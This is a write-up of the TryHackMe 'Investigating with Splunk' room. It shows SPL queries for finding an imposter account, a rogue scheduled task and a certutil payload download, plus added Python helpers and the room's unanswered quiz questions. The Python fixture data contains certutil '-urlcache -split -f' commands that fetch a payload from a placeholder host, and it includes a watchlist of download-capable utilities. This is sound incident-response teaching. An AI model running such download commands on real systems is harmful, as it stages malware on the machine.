
Cyber Incident Investigation with Splunk | TryHackMe Investigating with Splunk
Introduction
We covered investigating a cyber incident with Splunk. We examined the events generated on compromised Windows machines and uncovered the attack artifacts. This was part of the TryHackMe room Investigating with Splunk.
Scenario
SOC Analyst Johny has observed some anomalous behaviours in the logs of a few Windows machines. It looks like the adversary has access to some of these machines and has successfully created a backdoor. His manager has asked him to pull those logs from the suspected hosts and ingest them into Splunk for a quick investigation. Our task as SOC Analyst is to examine the logs and identify the anomalies.
Initial Search
I started by searching the Splunk index own_event_logs to retrieve all relevant events. I made sure the time filter was set to “All time” so that every available log was included.
Identifying an Imposter Account
I noticed there were 11 usernames in the logs, but the company structure only listed 9 employees plus the “system” account. To find the imposter, I used the following Splunk query to list unique usernames:
    index=own_event_logs | dedup user_name | table user_name
This revealed an account named “Amelia” where the ‘i’ was replaced with a ‘1’ (“Amel1a”), clearly indicating an imposter.
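The roster comparison above is done by eye in Splunk. The following Python is an added example (not code from the original post or from the TryHackMe room) that automates the same step: it reproduces the `dedup user_name` result over a constructed set of events, compares it to a constructed roster built from the names the post mentions, and flags names that only differ from a roster entry by common character substitutions (1 for i, 0 for o, and so on) or that sit close to a roster entry, such as the “Daina”/“Diana” spelling the post notes. Event fields, the roster contents and the similarity threshold are assumptions.

```python
"""Spot look-alike usernames against an employee roster.

Constructed example: Python stand-in for
  index=own_event_logs | dedup user_name | table user_name
followed by a comparison against the known-employee list.
"""
from difflib import SequenceMatcher

# Constructed roster: the post names five employees plus "system"; the
# remaining employees are not on the page and are left out here.
ROSTER = ["Amelia", "Haron", "Lion", "Chris Fort", "Diana", "system"]

# Constructed events shaped like the fields the SPL queries use.
EVENTS = [
    {"user_name": "Amelia", "process_name": "explorer.exe"},
    {"user_name": "Amel1a", "process_name": "cmd.exe"},
    {"user_name": "Haron", "process_name": "certutil.exe"},
    {"user_name": "Daina", "process_name": "outlook.exe"},
    {"user_name": "system", "process_name": "services.exe"},
    {"user_name": "Amelia", "process_name": "winword.exe"},
]

# Characters commonly swapped in to make a name look legitimate (assumed list).
HOMOGLYPHS = {"1": "i", "0": "o", "3": "e", "5": "s", "$": "s",
              "@": "a", "|": "l", "7": "t"}

# Fraction of matching characters above which a name is "close" (assumed).
NEAR_MATCH_RATIO = 0.75


def dedup_user_names(events):
    """Equivalent of `| dedup user_name | table user_name` (first-seen order)."""
    seen = []
    for ev in events:
        if ev["user_name"] not in seen:
            seen.append(ev["user_name"])
    return seen


def normalize(name):
    """Lower-case the name and undo the common look-alike substitutions."""
    return "".join(HOMOGLYPHS.get(c, c) for c in name.lower())


def similarity(a, b):
    """Character-level similarity in [0, 1]; 1.0 means identical."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio()


def classify_unknown(name, roster):
    """Return (verdict, matched_roster_name) for a name absent from the roster."""
    for real in roster:
        # Same name once substitutions are undone, but not literally the same:
        # this is the "Amel1a" case.
        if normalize(name) == normalize(real) and name.lower() != real.lower():
            return ("homoglyph-imposter", real)
    best = max(roster, key=lambda r: similarity(name, r))
    if similarity(name, best) >= NEAR_MATCH_RATIO:
        # Close but not a substitution: could be a typo or a variant spelling.
        return ("near-match", best)
    return ("unknown", None)


def find_suspicious_accounts(events, roster):
    """Map each logged username that is not on the roster to its verdict."""
    roster_lower = {r.lower() for r in roster}
    findings = {}
    for name in dedup_user_names(events):
        if name.lower() in roster_lower:
            continue
        findings[name] = classify_unknown(name, roster)
    return findings


if __name__ == "__main__":
    for user, (verdict, match) in find_suspicious_accounts(EVENTS, ROSTER).items():
        print(f"{user:12} {verdict:20} {match or '-'}")
```

Run against the constructed data this reports “Amel1a” as a homoglyph imposter for “Amelia” and “Daina” as a near-match for “Diana” that needs confirming with HR rather than treating as hostile; a name with no resemblance to anyone on the roster comes back as unknown.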
Investigating Scheduled Tasks
I then searched for “scheduled tasks” to find users running them. I discovered that the user “Chris Fort” from the HR department created a suspicious scheduled task named “OfficeUpdater” located in a temporary folder.
Finding the User Who Downloaded a Payload
My next step was to identify which user from the HR department executed a system process to download a payload from a file-sharing host. I filtered the logs for the HR department users: “Haron,” “Lion,” “Chris Fort,” and “Diana,” noting that “Diana” in the provided list was spelled “Daina” in the logs.
    index=own_event_logs user_name=Haron OR user_name=Lion OR user_name="Chris Fort" OR user_name=Daina
To narrow down the search, I decided to investigate each HR user individually, starting with “Haron.” I used the following query to list unique processes run by Haron:
    index=own_event_logs user_name=Haron | dedup process_name | table process_name
By examining the processes, I found certutil.exe (Search Utility), which can be used to download files.
Identifying the Download Date, Source, and Payload
To find the date and time certutil.exe was executed by Haron, I used:
    index=own_event_logs user_name=Haron process_name="certutil.exe" | table _time
To find the source URL and the downloaded payload, I displayed the command line arguments:
    index=own_event_logs user_name=Haron process_name="certutil.exe" | table command_line
This revealed the third-party site from which a malicious payload was downloaded. Visiting this site provided the flag needed to answer the remaining questions in the challenge.
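The three steps above (restrict to HR users, list each user's distinct processes, then pull the time and command line of the download utility) can be scripted outside Splunk once the events are exported. The Python below is an added example, not code from the post or the room: it runs the same pipeline over constructed events (the hostname uses the reserved .invalid domain as a placeholder, and the timestamps, command lines and the list of download-capable utilities are assumptions) and extracts the first URL from each matching command line. It also shows why filtering on process name alone is not enough: a certutil.exe run with no URL in its arguments is dropped.

```python
"""Which HR user ran a download-capable utility, when, and from where.

Constructed Python stand-in for the SPL in the post:
  index=own_event_logs user_name=Haron | dedup process_name | table process_name
  index=own_event_logs user_name=Haron process_name="certutil.exe" | table _time, command_line
"""
import re
from datetime import datetime

# HR users as the post lists them (log spelling for Diana).
HR_USERS = {"Haron", "Lion", "Chris Fort", "Daina"}

# Assumed watchlist of built-in Windows utilities able to fetch remote files.
DOWNLOAD_CAPABLE = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "powershell.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed events; fileshare.invalid is a placeholder, not a real host.
EVENTS = [
    {"_time": "2024-01-10T09:02:11", "user_name": "Haron", "process_name": "outlook.exe",
     "command_line": '"C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE"'},
    {"_time": "2024-01-10T09:15:40", "user_name": "Haron", "process_name": "certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://fileshare.invalid/OfficeUpdater.bin "
                     "C:\\Users\\Haron\\AppData\\Local\\Temp\\ou.bin"},
    {"_time": "2024-01-10T09:15:43", "user_name": "Haron", "process_name": "certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://fileshare.invalid/OfficeUpdater.bin "
                     "C:\\Users\\Haron\\AppData\\Local\\Temp\\ou.bin"},
    {"_time": "2024-01-10T10:01:05", "user_name": "Lion", "process_name": "certutil.exe",
     "command_line": "certutil.exe -verify C:\\certs\\mail.cer"},   # legitimate use, no URL
    {"_time": "2024-01-10T10:30:00", "user_name": "Chris Fort", "process_name": "winword.exe",
     "command_line": '"C:\\Program Files\\Microsoft Office\\WINWORD.EXE"'},
    {"_time": "2024-01-10T11:00:00", "user_name": "Amelia", "process_name": "certutil.exe",
     "command_line": "certutil.exe -urlcache -split -f http://fileshare.invalid/x.bin x.bin"},
]


def hr_events(events):
    """`user_name=Haron OR user_name=Lion OR ...` restricted to the HR users."""
    return [e for e in events if e["user_name"] in HR_USERS]


def unique_processes(events, user):
    """`user_name=<user> | dedup process_name | table process_name`."""
    out = []
    for e in events:
        if e["user_name"] == user and e["process_name"] not in out:
            out.append(e["process_name"])
    return out


def download_events(events):
    """Download-capable processes whose command line carries a URL, oldest first."""
    rows = []
    for e in events:
        if e["process_name"].lower() not in DOWNLOAD_CAPABLE:
            continue
        urls = URL_RE.findall(e["command_line"])
        if not urls:
            continue  # e.g. certutil -verify: no remote fetch involved
        rows.append({"_time": datetime.fromisoformat(e["_time"]),
                     "user_name": e["user_name"],
                     "process_name": e["process_name"],
                     "url": urls[0]})
    rows.sort(key=lambda r: r["_time"])
    return rows


def first_download_by_user(events):
    """Earliest URL fetch per user: who downloaded what, and when."""
    first = {}
    for r in download_events(events):
        first.setdefault(r["user_name"], r)
    return first


if __name__ == "__main__":
    scoped = hr_events(EVENTS)
    for user in sorted(HR_USERS):
        print(f"{user}: {unique_processes(scoped, user)}")
    for user, r in first_download_by_user(scoped).items():
        print(f"{r['_time'].isoformat()}  {user}  {r['process_name']}  {r['url']}")
```

Scoping to hr_events first keeps Amelia's certutil run out of the result, exactly as the OR-filter in the post does; dropping that scope shows every download across all users, which is the more useful view once the initial question is answered.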
Technical Commands Used
Here are the Splunk queries I used during my investigation:
- To list unique usernames:
    index=own_event_logs | dedup user_name | table user_name
- To filter logs for the HR users:
    index=own_event_logs user_name=Haron OR user_name=Lion OR user_name="Chris Fort" OR user_name=Daina
- To list unique processes run by Haron:
    index=own_event_logs user_name=Haron | dedup process_name | table process_name
- To find the execution time of certutil.exe by Haron:
    index=own_event_logs user_name=Haron process_name="certutil.exe" | table _time
- To find the command line arguments for certutil.exe by Haron:
    index=own_event_logs user_name=Haron process_name="certutil.exe" | table command_line
TryHackMe Investigating with Splunk Room Answers
On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?
On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?
Examine the logs and identify the user that the adversary was trying to impersonate.
What is the command used to add a backdoor user from a remote computer?
How many times was the login attempt from the backdoor user observed during the investigation?
What is the name of the infected host on which suspicious PowerShell commands were executed?
PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?
An encoded PowerShell script from the infected host initiated a web request. What is the full URL?